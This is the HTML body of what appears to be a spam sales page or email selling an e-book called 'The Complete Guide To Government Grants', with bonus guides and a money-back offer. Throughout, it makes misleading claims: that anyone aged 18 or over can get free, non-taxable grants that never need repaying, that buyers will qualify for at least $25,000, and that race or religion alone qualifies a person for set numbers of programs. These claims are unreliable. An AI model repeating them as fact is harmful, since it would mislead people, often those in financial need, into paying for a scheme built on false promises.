 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
